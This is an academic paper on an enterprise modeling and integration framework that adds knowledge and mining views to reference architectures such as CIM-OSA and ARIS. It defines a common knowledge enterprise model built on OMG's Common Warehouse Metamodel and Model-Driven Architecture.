This item was submitted to Loughborough University's Institutional Repository by the/an author. Additional Information: This article was accepted for publication in the journal International Journal of Production Research (© Taylor and Francis). The definitive version is available at: http://dx.doi.org/10.1080/00207540412331322939 Metadata Record: https://dspace.lboro.ac.uk/2134/9804 Version: Accepted for publication Publisher: © Taylor and Francis Please cite the published version. This item is made available under the Creative Commons Attribution-NonCommercial-NoDerivs 2.5 licence (http://creativecommons.org/licenses/by-nc-nd/2.5/).

An Enterprise Modeling and Integration Framework based on Knowledge Discovery and Data Mining

Elena I. Neaga* and Jennifer A. Harding **

The paper deals with the conceptual design and development of an enterprise modeling and integration framework using knowledge discovery and data mining.
First, the paper briefly presents the background and current state of the art of knowledge discovery in databases and of data mining systems and projects. Next, enterprise knowledge engineering is discussed. The paper suggests a novel approach that builds on existing enterprise reference architectures, integration and modeling frameworks by introducing new enterprise views, such as mining and knowledge views. An extension and a generic exploration of the information view that already exists within some enterprise models are also proposed. The Zachman Framework for Enterprise Architecture is also outlined against the existing architectures and the proposed enterprise framework. The main contribution of this paper is the identification and definition of a common knowledge enterprise model, which represents an original combination of previous projects on enterprise architectures with the Object Management Group (OMG) models and standards. The identified common knowledge enterprise model has therefore been designed using the OMG’s Model-Driven Architecture (MDA) and Common Warehouse Metamodel (CWM), and it also follows the RM-ODP (ISO/OSI). It has been partially implemented in Java™, Enterprise JavaBeans (EJB) and Corba/IDL. Finally, the advantages and limitations of the proposed enterprise model are outlined.

1. Introduction

One of the foremost challenges facing manufacturing industry nowadays is the large-scale integration of enterprise systems, along with their associated models, data, information, knowledge and web descriptions. To achieve a high level of integration of managerial and technical elements, companies are resorting to standard reference architectures and common enterprise models, usually developed within international projects.
On the other hand, enterprise systems generate large amounts of data, which are a valuable asset and potentially an important source of new information and knowledge for improving the business of the enterprise, gaining competitive advantage in fierce markets and coping with changes and managerial complexity. Large organizations such as manufacturing companies could respond to changes and challenges in their business and production activities by using intensive and intelligent database processing to identify new trends and to predict and improve their business performance. Knowledge discovery (KD) in databases is therefore a promising solution, and this paper focuses on using emerging knowledge technologies such as data mining for enterprise integration and modeling. However, a comprehensive and comparative review of the literature related to knowledge discovery, data mining and enterprise integration and modeling approaches reveals that no interdisciplinary research has been reported. This paper suggests that extending the existing enterprise modeling and integration architectures and environments to incorporate KD and data mining (DM) systems could significantly contribute to improving the decision-making process and business performance. This paper therefore mainly addresses the design and development of a framework for enterprise engineering which considers knowledge discovery in databases and data mining processing to be essential. One of the most important practical issues of the research reported in this paper is to include and accommodate a generic KD&DM system within the existing standardized and referenced enterprise architectures and models. In order to address this issue in a systematic, effective and standard manner, the paper proposes introducing new views within the existing reference architectures for enterprise modeling and integration.
Finally, a common knowledge enterprise model applied to the extended enterprise is designed and partially developed. The most well-known enterprise architectures of the 1990s include CIM-OSA, ARIS, PERA and GERAM (ESPRIT 1993, Vernadat 1996, Rolstadas and Anderson 2000). However, research efforts have been especially devoted to looking for new architectures in order to accommodate changing conditions, recent technical advances and the requirements of new manufacturing paradigms such as agile, holonic, bionic, fractal and virtual. The research presented in this paper also considers the Reference Model of Open Distributed Processing (RM-ODP), an ISO coordinating framework to support the design of distributed systems in heterogeneous environments based on the standardization of open distributed processing (ISO/OSI 1995). Section 2 briefly presents the background of knowledge discovery, data mining, and related systems, projects, standards and modeling techniques. Section 3 defines an enterprise modeling and integration framework that draws on previous enterprise engineering approaches and is based on knowledge discovery and data mining, regarded here as emerging knowledge technologies. Generally, a framework is defined as a more general concept than an architecture, including incomplete and general design and implementation roadmaps or guidelines for a range of enterprise information systems. Hence, different architectures can be developed within a framework (Molina 1995, Vernadat 1996, Molina and Bell 2002, Neaga 2003). Within the framework described in this paper, a common knowledge enterprise model is identified; it is analyzed and modeled in section 4. This model is applied to the extended enterprise as shown in sub-section 4.3.
The remainder of the paper includes, in section 5, the development aspects; in section 6 the advantages and the limits of the Common Knowledge Enterprise Model are presented.

2. Background of Knowledge Discovery and Data Mining

Knowledge discovery (KD) and data mining (DM) are interdisciplinary areas directed at intelligently exploring large databases in order to find and use patterns, new information and knowledge. KD and DM incorporate complex algorithms from statistics and artificial intelligence, including imaginative and intuitive processing. Like other evolutionary systems, especially those based on neural networks, DM applications tend to use both rational and emotional intelligence, defined as affective intelligence (Adami 1998, Neaga 2003). The main DM techniques are On-Line Analytical Processing (OLAP) and methods based on classification, association rules, clustering, decision trees, sequential patterns, fuzzy logic and combinations of algorithms such as neural networks (NN) and case-based reasoning (CBR) (Fayyad et al. 1996, Ebecken 1998, Bramer 1999, Adamo 2001, Han and Kamber 2001, Klosgen and Zytkow 2002). It is also possible to consider DM more as a set of organized activities than as methods in their own right, because the main algorithms are drawn from closely related areas such as statistics and/or artificial intelligence. Manufacturing enterprises rely on vast amounts of data and information located in large databases. This information is a valuable resource, but its value can be increased if additional knowledge can be gained from it. The exploration of database information, to identify and extract deep and hidden knowledge, is made possible by DM techniques (Ebecken 1998). The existing databases of manufacturing enterprises, or indeed of most large organizations, are huge but largely untapped sources of information, since they contain valuable records of operational and market history.
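Of the DM techniques just listed, association-rule mining is easy to illustrate with a self-contained toy pass over transactions (production systems use Apriori- or FP-growth-style algorithms; this brute-force sketch only mines single-antecedent rules, and the grocery data is invented):

```python
from itertools import combinations

def association_rules(transactions, min_support, min_confidence):
    """Mine one-antecedent rules A -> B from a list of transactions.
    support(A -> B) = P(A and B); confidence(A -> B) = P(B | A)."""
    n = len(transactions)
    counts = {}
    # count every single item and every item pair
    for t in transactions:
        for size in (1, 2):
            for items in combinations(sorted(set(t)), size):
                counts[items] = counts.get(items, 0) + 1
    rules = []
    for (a, b), c in [(k, v) for k, v in counts.items() if len(k) == 2]:
        for lhs, rhs in ((a, b), (b, a)):
            support = c / n
            confidence = c / counts[(lhs,)]
            if support >= min_support and confidence >= min_confidence:
                rules.append((lhs, rhs, support, confidence))
    return rules
```

Applied to enterprise databases, the same idea surfaces rules such as "orders containing part X usually also contain part Y", which is precisely the kind of hidden pattern the text refers to.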
DM techniques can be used to improve strategic and operational planning activities, as databases can be explored to gain feedback on the past performance and business behaviour of the enterprise, as shown in Neaga and Harding (2002) and Neaga (2003). A data warehouse is an optional stage for performing data mining: it efficiently and effectively collects and stores data from multiple, distributed and heterogeneous operational databases, organizes the data using the data mart concept, and keeps historical data for future analysis (Adriaans and Zantinge 1996, Harding and Yu 1999).

2.1 Overview of Data Mining Systems, Projects and Standards

Nowadays the trends in DM are towards the standardization of projects, the use of common methods and tools, and the definition of repeatable activities. CRISP-DM (Cross Industry Standard Process for Data Mining), SolEuNet (Data Mining and Decision Support for Business Competitiveness: A European Virtual Enterprise), Kensington Enterprise Data Mining (Imperial College, Department of Computing, London) and other projects have established methodologies and developed dedicated languages and software tools for KD and DM processing (SolEUNet 1999, Chapman et al. 1999, 2000, Helberg 2002). Predictive Model Markup Language (PMML) is a Data Mining Group (DMG) open standard format, based on an XML specification, for exchanging mining models between applications running on different platforms. Common Warehouse Metamodel (CWM) is an OMG UML/XML-based specification for mining models defined as metadata (OMG 2000). However, these projects, dedicated languages and standards are not correlated with the enterprise modeling and integration projects and the related standards for distributed manufacturing. Moreover, most DM products focus on the mining technology rather than on ease of use, integration, scalability and portability.
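The warehouse role described above, collecting data from multiple operational databases into analysis-oriented data marts, can be sketched as a simple extract-and-consolidate step (the source names and row layout are invented for illustration):

```python
def build_mart(sources, key, measure):
    """Consolidate rows from several operational sources into one
    data-mart-style aggregate keyed on `key`, summing `measure`.
    Each source is just a list of row dicts in this sketch."""
    mart = {}
    for name, rows in sources.items():
        for row in rows:
            k = row[key]
            entry = mart.setdefault(k, {"total": 0, "sources": set()})
            entry["total"] += row[measure]
            entry["sources"].add(name)  # keep provenance for later analysis
    return mart
```

A real warehouse adds cleansing, schema reconciliation and history keeping, but the essential move, a unified subject-oriented view over heterogeneous operational stores, is the one shown.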
Neaga (2002, 2003) and Harding (2002) have recommended, for manufacturing engineering applications, the use of the PolyAnalyst system as well as data mining source libraries such as Weka and ArMiner.

3. Enterprise Knowledge Engineering Approach

The enterprise engineering approaches define generic modalities of modeling, analysis and design for several enterprise systems, including information, manufacturing and business systems. These approaches usually include methodologies related to building and executing the models of an integrated and/or extended enterprise and the related IT support systems. The reference architectures are useful for abstracting different views of the enterprise, specifying modeling approaches to emphasize enterprise properties and defining the life-cycle of the enterprise engineering activities. However, the reference architectures do not specify how integration, collaboration and communication within an enterprise and/or extended enterprise are realized, especially in the context of sharing data, information, knowledge and web models. For example, a model may show that an information flow between two functions is desirable for integrating a business process, but it does not specify how to implement the integrated information flow (Giachetti 2004). There are several enterprise modeling approaches and reference architectures, such as CIM-OSA, ARIS, PERA, GRAI, TOVE and GERAM, which constitute a common environment and methodology for complex system integration, comparative analysis, modeling design and re-design of a manufacturing enterprise using advanced software tools (ESPRIT 1993, Bernus et al. 1996, Fox 1996, Vernadat 1996, Edwards et al. 1998, Aguiar and Edwards 1999, Harding et al. 1999, Toh 1999a, b, Rolstadas and Anderson 2000, Wang et al. 2002, Shen et al. 2004).
Consideration of these approaches, especially CIM-OSA, is justified in order to define a new enterprise model, because these reference architectures may already be used by some companies that may become part of an extended enterprise. Although current advanced and intelligent data exploration was not originally included within these early projects, they do create the basis on which to build a common enterprise model based on knowledge discovery and data mining. It can be argued that a reference architecture such as the Computer Integrated Manufacturing – Open System Architecture (CIM-OSA), which comprises several main views, for example function, information, resource and organization views, has been found to be sufficient for the building and execution of several particular enterprise models (Toh 1999a, b, Wang et al. 2002). The Architecture of Integrated Information Systems (ARIS) contains organization, function, data and control views (Scheer and Kruse 1994). Generally, the existing reference architectures do not include specific views to support advanced knowledge processing, even though the fact that knowledge has different representations is acknowledged. Aguiar and Edwards (1999) described knowledge capture for enterprise model building and knowledge manipulation for enterprise model execution. However, the associated Systems Engineering Workbench for Open Systems Architecture, SEW-OSA (ESPRIT 1993, Edwards et al. 1998, Aguiar and Edwards 1999), did not include advanced knowledge processing elements and/or sub-systems. Giachetti (2004) presents a detailed framework to review the information integration of the enterprise. He stated that the various information integration issues and supporting systems, and their relationships to each other, have not been sufficiently investigated and defined.
His article presents an enterprise information integration framework that aims to bridge parallel approaches towards integration so that the information integration requirements can be better understood globally and a generic representation used. This framework has included ontology definitions and different knowledge exchange and communication languages. The data warehouse is considered only for data integration aspects, because it provides a global data view for the purposes of analysis. However, within the information integration framework presented by Giachetti (2004), the data view is not exploited further to gain information and knowledge, as it is in the approach presented here, especially through the addition of new views to ARIS. The new information, as well as the discovered knowledge, constitutes a support for achieving a high level of enterprise integration, and extended enterprise communication and collaboration, based on both reference architecture and knowledge modeling. Knowledge discovery and its advanced processing and maintenance should bring a considerable advantage for improving business performance and the flexibility of future manufacturing system design and re-engineering, and new product development and introduction. These issues have been approached and demonstrated within several research projects related to information and knowledge modeling (Molina 1995, Harding 1996, Zhao et al. 1999, Dorador and Young 2000, Molina and Bell 2002). Wang et al. (2002) have introduced a few considerations about data source integration and the data warehouse, and Williams (1996) has defined the requirements for data shared between enterprise entities for the PERA reference architecture.

Insert figure 1 about here

CIM-OSA includes function, information, resource and organization views, which are described in detail in (ESPRIT 1993, Bernus et al. 1996, Vernadat 1996, Toh 1999a, b, Wang et al. 2002).
The number of views is not limited, and it can be expanded as necessary, but it is recommended that the number be kept to the minimum possible. The existing views enable designers and users to better understand and communicate the structure, purposes, capabilities, resources and relationships within the enterprise and a network of enterprises. However, they do not particularly support them in identifying and extracting knowledge that exists within the system, mainly because they do not capture knowledge in a systematic and organized manner. Hence, different views of the enterprise, and of the extended enterprise, are needed to enable efficient knowledge extraction through data mining. Therefore it is necessary to define the knowledge view as the description of processed information with an associated meaning, which leads to an action that adds value to the initial data. The extended CIM-OSA cube depicted in figure 1 defines the high level representation of an enterprise engineering modeling and integration framework based on knowledge discovery and data mining. The knowledge view facilitates enterprise modeling, integration, collaboration and coordination from the knowledge perspective. Also, if enterprise modeling is considered as the process of building models of the whole or part of the enterprise, such as process models, data models, resource models etc., based on knowledge about the enterprise, previous models and/or reference models, as well as domain ontologies and a model representation language (Vernadat 1996), then mining models are directed to logically fit or overlap with enterprise models, except that they are obtained by knowledge discovery. Descriptive enterprise models are widely used and usually are based on diagrams described in an Integrated Definition (IDEF) language, which derives from the **Structured Analysis and Design Technique (SADT)** (Toh 1999b, Toh and Harding 1999, Dorador and Young 2000, Aguilar-Savén 2004, Shen et al. 2004).
Generally these models describe the business processes across the enterprise, and the related modeling and integration framework enables a common understanding and analysis of the business activities. These models can be complemented and improved with **mining descriptive models** describing patterns in existing data about an enterprise’s behaviour and past performance. The **mining predictive models** could be used to forecast enterprise model evolution and the enterprise’s future business behaviour, such as its position in the market. These models may evaluate the initial enterprise model, its evolution during model execution and its achievements, and forecast future business. Enterprise knowledge could be classified as follows:
- Knowledge about the past, which is stable, voluminous and accurate;
- Knowledge about the present, which is unstable, compact and may be inaccurate;
- Knowledge about the future, which is hypothetical.
Knowledge discovery and data mining are critical processes applied to existing enterprise databases in order to find new information, knowledge and patterns which indicate future enterprise behaviour and improve business performance. Moreover, because the mining models are based on enterprise applications/systems, they may provide a generic description of the business and production processes as well as of product representations. Furthermore the knowledge view supports other areas of knowledge engineering and management, and it makes possible the distinction between tacit (implicit) and explicit knowledge (Polanyi 1966):
- **Tacit knowledge**: implicit; the mental models and experiences of individuals.
- **Explicit knowledge**: formal models, rules and procedures.
The conventional model to turn data into information and further into knowledge is defined as follows:
\[ \text{data} \implies \text{information} \implies \text{knowledge} \implies \text{wisdom} \]
However, one of the main goals of data mining is to gain new information and knowledge from databases.
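The contrast between descriptive and predictive mining models can be made concrete with a toy example. The sketch below is not from the paper; the class and method names are invented for illustration. It treats a series of past performance figures as "knowledge about the past": a mean summarizes it descriptively, while a least-squares trend line yields a hypothetical forecast, i.e. "knowledge about the future".

```java
// Illustrative only: a descriptive summary vs. a predictive trend model
// applied to a series of past performance figures.
public class TrendSketch {

    // Descriptive model: a simple summary of past behaviour.
    public static double mean(double[] y) {
        double s = 0;
        for (double v : y) s += v;
        return s / y.length;
    }

    // Fit a least-squares line y = a + b*t over t = 0..n-1.
    // Returns {a, b} (intercept, slope).
    public static double[] fit(double[] y) {
        int n = y.length;
        double tBar = (n - 1) / 2.0;
        double yBar = mean(y);
        double num = 0, den = 0;
        for (int t = 0; t < n; t++) {
            num += (t - tBar) * (y[t] - yBar);
            den += (t - tBar) * (t - tBar);
        }
        double b = num / den;
        return new double[] { yBar - b * tBar, b };
    }

    // Predictive model: extrapolate the fitted trend to a future period t.
    public static double forecast(double[] y, int t) {
        double[] ab = fit(y);
        return ab[0] + ab[1] * t;
    }

    public static void main(String[] args) {
        double[] sales = { 2, 5, 8, 11, 14 }; // figures for past periods
        System.out.println("mean = " + mean(sales));
        System.out.println("forecast for period 5 = " + forecast(sales, 5));
    }
}
```

A real mining predictive model would of course be richer (decision trees, regression over many attributes), but the division of labour is the same: the descriptive part characterizes accumulated data, the predictive part extrapolates beyond it.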
Therefore data mining may process the information embedded in the information view, and the new information, knowledge and patterns could be captured in the same view. In order to obtain a distinct separation, an additional view of the enterprise is suggested, and this is called the mining view. The **mining view** should include the description of mining models and of new business, manufacturing and product models obtained through knowledge discovery, OLAP, data mining and other advanced data exploratory techniques. The **data view** represents the abstract level of all data manipulated by the different software systems within an enterprise information system. Therefore a data view has to be considered at the level of enterprise architecture, and the definition of a high level enterprise data architecture should significantly support data mining. The data view exists as part of ARIS, and this has been used as a basis for the inclusion of additional views such as the information, knowledge and mining views, as depicted in figure 2.
Insert figure 2 about here
Generally, adding new views or extending the interpretation of existing views provides support for the development of applications based on knowledge and business intelligence solutions. However, CIM-OSA, PERA, ARIS, GERAM etc. are high level and abstract reference architectures which do not offer implementation solutions, especially for specific IT systems such as DM applications which process particular data stored in operational databases. It is therefore suggested that the implementation solutions should be based on an application view obtained through a unified perspective of an enterprise’s applications, such as supply chain, enterprise resource planning and customer relationship management systems, supported by advanced software tools such as SAP, I2 Technologies, Manugistics etc. (Neaga 2003).
The identified enterprise model is based on the enterprise’s applications and their combination, in order to demonstrate the application of KD&DM in several manufacturing and business areas. Moreover the OMG’s CWM, which has been employed to design the common knowledge enterprise model, provides a clear manner of linking it with a generic representation of enterprise applications.
3.1. Outline of the Zachman Framework for Enterprise Architecture
Zachman (1996, 1999), an internationally recognized expert on Enterprise Architecture and author of a Framework for Enterprise Architecture, defines a strong and logical connection between business processes, organization strategies and enterprise architectures. This approach also emphasizes that an enterprise must produce models in order to deliver systems implementations in the short term and, at the same time for the long term, instantiate the architecture process in order to ensure the on-going coherence of system implementations and to build an enterprise environment conducive to accommodating high rates of change. The Zachman Framework could also be defined as a conceptual methodology which shows how all of the specific architectures that an organization might define can be integrated into a comprehensive and coherent environment for enterprise systems. It is an analytic model or classification scheme that organizes descriptive representations. It does not describe an implementation process and is independent of specific guidelines (Frankel et al. 2003). In summary, this framework has the following characteristics (Zachman 1996):
a. Simplicity: it is easy to understand and it is not technical, but purely logical. In its most elementary form, it has three perspectives: Owner, Designer, Builder, and three abstractions: Material, Function, Geometry. Anybody (technical or non-technical) can understand it.
b. Comprehensiveness: it addresses the enterprise as a whole.
Any issue can be mapped against it to understand where it fits within the context of the enterprise as a whole.
c. Language support: it helps one to think about complex concepts and to communicate them precisely using few, non-technical terms.
d. Planning tool: it helps to make better choices about enterprise planning and its objectives. It is possible to find the best alternative in the context of a complex business with a range of alternatives.
e. Problem solving: it enables working with abstractions, simplifying, and isolating simple variables without losing a sense of the complexity of the enterprise as a whole.
f. Neutrality: it is defined totally independently of tools or methodologies, and therefore any tool or any methodology can be mapped against it.
Generally, compared to the Zachman framework, any academic research project in the area of enterprise engineering is more complicated, and in consequence there may be many limitations or restrictions in applying it to a specific enterprise. Furthermore, a framework which also considers knowledge discovery and data mining becomes too restrictive and difficult to apply in practice, due to the many systems that are involved. The Zachman framework is very general and can oversimplify some enterprise issues, such as business performance and behaviour, although it takes into consideration decision support systems, analytical processing and data exploration. However, the corresponding systems cannot be integrated industry-wide like the enterprise applications supported by the framework proposed within this paper. Generally, the expense of building a data warehouse in a given enterprise is substantial and may not deliver a quick return on investment. Frankel et al. (2003) have elaborated a mapping methodology between the Zachman framework and the Model-Driven Architecture (MDA) developed by OMG.
The Common Warehouse Metamodel (CWM), defined at the heart of MDA, is used to develop the common knowledge enterprise model, as described in the next sections.
4. The Common Knowledge Enterprise Model
4.1 Introduction to Model-Driven Architecture and the Common Warehouse Metamodel
Model-Driven Architecture (MDA) is the latest OMG initiative, developed in order to support enterprises and organizations in integrating new applications with existing systems. MDA is middleware that acts as a high-level abstract architecture based on the UML methodology and existing profiles. At the heart of MDA are the already defined Meta-Object Facility (MOF), CORBA, XMI/XML and the Common Warehouse Metamodel (CWM) (OMG 2001). The Common Warehouse Metamodel (CWM) defines a generic model that enables data exchange and sharing across databases, or even data warehouses, across enterprises (OMG 2000, Poole et al. 2002, 2003). It is a new open industry standard, recently adopted by companies such as Oracle, SAS and others, which are progressing towards incorporating this standard in their implementations. CWM is also a common metamodel which should be independent of any specific data warehouse implementation, but which becomes domain specific in association with domain specifications such as the common knowledge enterprise model presented in this paper. The metamodel is developed as a set of packages which describe metadata. Metadata is defined as data describing data, or information about data, and generally it comprises a description of information structures and models (Poole et al. 2002, 2003). Using the CWM supported by MDA, an identified common knowledge enterprise model has been modeled and designed. This phase has been carried out using UML as implemented in Rational Rose Enterprise Edition (Rational Co. 2000).
4.2 Enterprise Model Description
The enterprise modeling and integration framework based on knowledge discovery and data mining, which is shown in figure 3, provides for the design, development and implementation of a common knowledge enterprise model. Figure 3 illustrates that the enterprise framework defines a unified environment for the integration of knowledge discovery and data mining systems, such as PolyAnalyst™, Clementine etc., and libraries of programs such as Weka, ArMiner etc., with enterprise systems such as SAP, I2 Technologies, PeopleSoft, JD Edwards etc. The framework conforms to existing reference architectures for enterprise modeling and integration, and it is based on OMG middleware definitions such as the Common Warehouse Metamodel (CWM) and Model-Driven Architecture (MDA). The identified common knowledge enterprise model intensively exploits previous projects, models, standards and methodologies in both areas of enterprise engineering and data mining. The identified common knowledge enterprise model has been designed using the OMG’s CWM described in UML, and the structure of the main model is shown in figure 4. The model depicted in figure 4 is a combination of a main model called CWM-DM (OMG 2000) and the enterprise information models produced by the enterprise reference architectures and models previously described in section 3. Therefore an identified common knowledge enterprise model consists of a MiningModel having at its heart MiningSettings and an ApplicationInputSpecification, which specifies the enterprise applications and systems. MiningModelResult represents the generated model that is output from the mining activities. The class SupervisedMiningModel extends MiningModel to include supervised learning such as classification and regression. Hence, this class requires a TargetAttribute, which provides the correspondence between an ApplicationAttribute and the obtained SupervisedMiningModel.
Supervised learning is applied to a data set which describes an Application, identified by ApplicationInputSpecification and ApplicationAttribute, to obtain this model. The attribute function of MiningModel describes the DM function class (e.g. AssociationRules), whereas the attribute algorithm is used to specify the concrete algorithm (e.g. decisionTree). This model also contains classes corresponding to the employed algorithms and learning techniques, such as (OMG 2000, Poole et al. 2002, 2003):
- **StatisticsMiningModel**: statistical models;
- **AssociationRulesMiningModel**: association rule models;
- **SequentialMiningModel**: sequential analysis models;
- **SupervisedMiningModel**: supervised learning models;
- **ClusteringMiningModel**: clustering models.
The **EE_ApplicationSpecification** class describes the classes representing enterprise applications or combinations of these. This part of the model is not part of OMG’s CWM, but the link at the level of application modeling provides a high level of integration of different applications. This class incorporates a Customer Relationship Management (CRM) class, a Supply Chain Management (SCM) class, an Enterprise Resource Planning (ERP) class, and product, manufacturing and marketing models usually described using a Product Data Management (PDM) system. The **EE_ApplicationSpecification** class also has the role of eliminating the redundant information which could appear in the classes describing the enterprise systems and applications. Through a one-to-one multiplicity link, the class ApplicationInputSpecification defines the set of input attributes for the mining model that are further used for enterprise modeling and integration and/or inter-enterprise communication in an extended enterprise. The common knowledge enterprise model supports the development of standard collaborative information systems which are also platform-independent.
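As a reading aid, the class relationships just described can be sketched in Java. This is only an illustrative shape, not the paper's actual CWM-based implementation: the class names follow figure 4, but the fields, constructors and the attribute-deduplication logic are assumptions made for this sketch.

```java
import java.util.*;

public class CommonKnowledgeModelSketch {

    // Simplified stand-in for the CWM-DM MiningModel class.
    static class MiningModel {
        final String function;   // DM function class, e.g. "classification"
        final String algorithm;  // concrete algorithm, e.g. "decisionTree"
        MiningModel(String function, String algorithm) {
            this.function = function;
            this.algorithm = algorithm;
        }
    }

    // Supervised learning (classification, regression) additionally
    // requires a target attribute.
    static class SupervisedMiningModel extends MiningModel {
        final String targetAttribute;
        SupervisedMiningModel(String function, String algorithm, String target) {
            super(function, algorithm);
            this.targetAttribute = target;
        }
    }

    // EE_ApplicationSpecification unifies the attributes of the CRM, SCM
    // and ERP classes and eliminates redundant attributes that appear in
    // more than one system, yielding the inputs for a mining model.
    static class EEApplicationSpecification {
        final List<String> crm, scm, erp;
        EEApplicationSpecification(List<String> crm, List<String> scm, List<String> erp) {
            this.crm = crm; this.scm = scm; this.erp = erp;
        }
        List<String> inputAttributes() {
            Set<String> unified = new LinkedHashSet<>(); // keeps order, drops duplicates
            unified.addAll(crm);
            unified.addAll(scm);
            unified.addAll(erp);
            return new ArrayList<>(unified);
        }
    }

    public static void main(String[] args) {
        EEApplicationSpecification spec = new EEApplicationSpecification(
                List.of("customerId", "region"),
                List.of("customerId", "leadTime"),
                List.of("region", "cost"));
        // "customerId" and "region" occur in two systems but appear once here.
        System.out.println(spec.inputAttributes());
        MiningModel m = new SupervisedMiningModel("classification", "decisionTree", "churn");
        System.out.println(m.function + "/" + m.algorithm);
    }
}
```

The deduplication in `inputAttributes()` corresponds to the role, stated above, of eliminating redundant information across the enterprise system classes.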
Furthermore, this paper demonstrates that if an information system follows reference architectures and models and also uses OMG standards such as UML, CORBA and MDA, then standard information systems can be incorporated in its design and can be flexibly integrated within the enterprise reference architectures. This model also allows standard knowledge discovery and data mining applications to be developed which adhere to the RM-ODP framework as well as to the DM standards developed by OMG and the Data Mining Group (Neaga 2003).
4.3 Application of the model to the extended enterprise
An **extended enterprise** is defined as a long-term co-operation and partnership based on information and knowledge exchange (Szegheo 1999) and the co-ordination of the manufacturing activities of collaborating independent enterprises and related suppliers (Jagdev and Browne 1998). The extended enterprise makes intensive use of communication and collaboration between manufacturing enterprises, and aims to achieve competitive advantage (Vernadat 1996, Harding et al. 1999, Szegheo 1999). A **virtual enterprise** is a temporary alliance between enterprise systems using Internet and intranet technologies (Szegheo 1999). Jagdev and Browne (1998) and Zhang and Browne (1999) have comprehensively and comparatively analysed the extended and virtual enterprise issues and their associated concepts and paradigms. The model suggested here is based on business process modeling and integration (Shen et al. 2004). Global competition and distributed resources make it necessary for the extended enterprise to create and use a framework that enables the association of product development, supply chain management activities and manufacturing strategies. The application of the common knowledge model to the extended enterprise is directed at solving the above issue.
For the extended enterprise, a non-overlapping combination of enterprise systems and applications is assumed, such as a supply chain management (SCM) system, a customer relationship management (CRM) system and an enterprise resource planning (ERP) system, which may also support the business processes. For example, a particular company may focus on implementing an ERP system, whilst others concentrate on SCM, CRM and other enterprise systems. The non-overlapping combination of enterprise systems represents the logical integration of dissimilar and complex applications which run in the same environment as the extended enterprise. Generally, these applications support different processes, such as business and production processes and the relations between suppliers and customers within the extended enterprise. However, these systems may generate redundant and identical data which needs to be pre-processed or aggregated in a data warehouse. Also, some companies, particularly those with technical products, may use Product Data Management (PDM) applications in order to improve their supply chains, because a collaborative PDM system has the capabilities not only to define product components but also to share this design information along the supply chain. In the same manner as a company running an individual business, an extended enterprise could consider the strategies which are of vital importance in order to achieve its business objectives (Platts and Gregory 1991, Storey 1994, Wang and Bell 1994). Also, a competitive strategy involves using business analysis to maximize the value and capabilities that distinguish an organization from its competitors (Porter 1980, 1998). Shen et al. (2004) have suggested a framework based on business process modeling and integration across companies and units which may be part of an extended enterprise. This approach provides data and information flow descriptions.
However, there is no specification regarding the huge amounts of data generated by applications and accumulated in databases which could be explored further. In order to formulate and include the strategies for an extended enterprise it is necessary to define its objectives, which may include aspects of quality, delivery, cost, flexibility and innovation as both short-term and long-term objectives. Therefore the common knowledge enterprise model has been extended with the Extended Enterprise Strategies and Generic Product Data classes. The Extended Enterprise Strategies class and its associated sub-classes, which link strategic management and operations, are presented in figure 5. These classes logically describe several concepts, such as JIT (Just-in-Time), TQM (Total Quality Management), LP (Lean Production), MRPII (Manufacturing Resource Planning), ERP (Enterprise Resource Planning), FMS (Flexible Manufacturing Systems) etc., which capture the changes in the global economy and competitive market places. The GenericProductData class and its sub-classes presented in figure 6 describe the following items (Harding 1996, Dorador and Young 2000, Wortmann et al. 2001):
- a CAD geometrical product model, including a feature-oriented product description;
- a STEP (Standard for the Exchange of Product Model Data) and Express product neutral model class, which describes the neutral data format for the representation and exchange of product data;
- a Product Data Management (PDM) representation.
5. Development Issues
From the IT perspective, an integrating infrastructure is a set of common services and functions available as middleware to all applications on the different platforms of a distributed system (Vernadat 1996). The Object Management Group (OMG) has developed the Common Object Request Broker Architecture (CORBA) and the associated Interface Definition Language (IDL) (Orfali et al.
1997, Orfali and Harkey 1998), and most recently the Model-Driven Architecture (MDA) and the Common Warehouse Metamodel (CWM). The defined classes of a prototype system have been generated and transferred into Oracle JDeveloper, which is Oracle's Java development tool for building, debugging and deploying Internet applications. Java source generation is based on the component specification rather than on the class specification. In order to generate Java source code, after the class diagrams have been created, every class is assigned to a valid Java component. In practice the following methods have been used (Rational Co. 2000):
1. Generating Java source from a Class Diagram;
2. Generating Java source from a Component Diagram.
JDeveloper V3.2 includes Java Database Connectivity (JDBC) capability for an Oracle database and automatic generation of CORBA interfaces. It also includes Oracle Business Components for Java, an Extensible Markup Language (XML)-powered application component framework that significantly simplifies the development, deployment and customization of multi-tier Java applications for the Internet. Furthermore, Enterprise JavaBeans (EJB) offer the possibility of developing reusable enterprise components, including knowledge discovery and data mining components. Some Application Programming Interfaces (APIs) have been proposed, with the aim of making dissimilar software systems run in the same environment. In order to leverage legacy databases, existing applications and data mining systems, a set of CORBA/IDL interfaces has been generated. Neaga (2003) includes some details about the implementation and the development of object wrappers using CORBA/IDL. 6.
Advantages and Limits of the Common Knowledge Enterprise Model
The main advantages of the enterprise integration and modeling framework and of the common knowledge enterprise model described in this paper are as follows:
- The inclusion, within the high level enterprise reference architectures and models, of the knowledge and mining views, which provide good potential for performing intelligent data exploration such as data mining on enterprise databases. Knowledge discovery in databases and data mining could significantly contribute to the improvement of the business performance of an enterprise, and facilitate the re-engineering and re-design of manufacturing systems as well as new product introduction, design and manufacture.
- The definition of a unified object-oriented framework for manufacturing, product, mining and knowledge models and associated support systems, based on OMG's MDA and CWM.
- The identification of a common knowledge enterprise model which is fully designed using a new standard developed by OMG for data warehousing and mining, namely the CWM.
- The identified enterprise model has been partially implemented in Java™, Enterprise JavaBeans (EJB) and CORBA/IDL.
- The possibility of mapping the identified enterprise model to standards and to generic enterprise models obtained from the Zachman framework and RM-ODP.
However, the approach presented in this paper has the following limitations:
- The combination of several systems which individually satisfy particular requirements may not provide the best overall solution (Toh and Harding 1999). The common knowledge enterprise model supported by an enterprise framework based on knowledge discovery has not included any selection methodology for software systems as suggested by Toh and Harding (1999).
- Enterprise Resource Planning (ERP) software is the dominant strategic platform for supporting enterprise-wide business processes.
However, it has been criticised for being inflexible and for not meeting specific organisation and industry requirements. An alternative approach, best of breed (BoB), integrates components of standard packages and/or custom software. The BoB integration approach describes the specifications needed to integrate software systems, especially ERP applications, developed by different software vendors (Light 2001). BoB is not an integration environment; rather, it is a strategy that could provide flexible integrated enterprise solutions that are complementary to the enterprise modeling and integration framework suggested in this paper.
- Business process modeling and automation using workflow techniques and associated tools, including workflow-based business process discovery and mining, have very good potential (Aguilar-Savén 2004, Shen et al. 2004). However, workflow methods are not supported by this framework, which is focused on data and its intelligent exploration, mainly in order to gain knowledge.
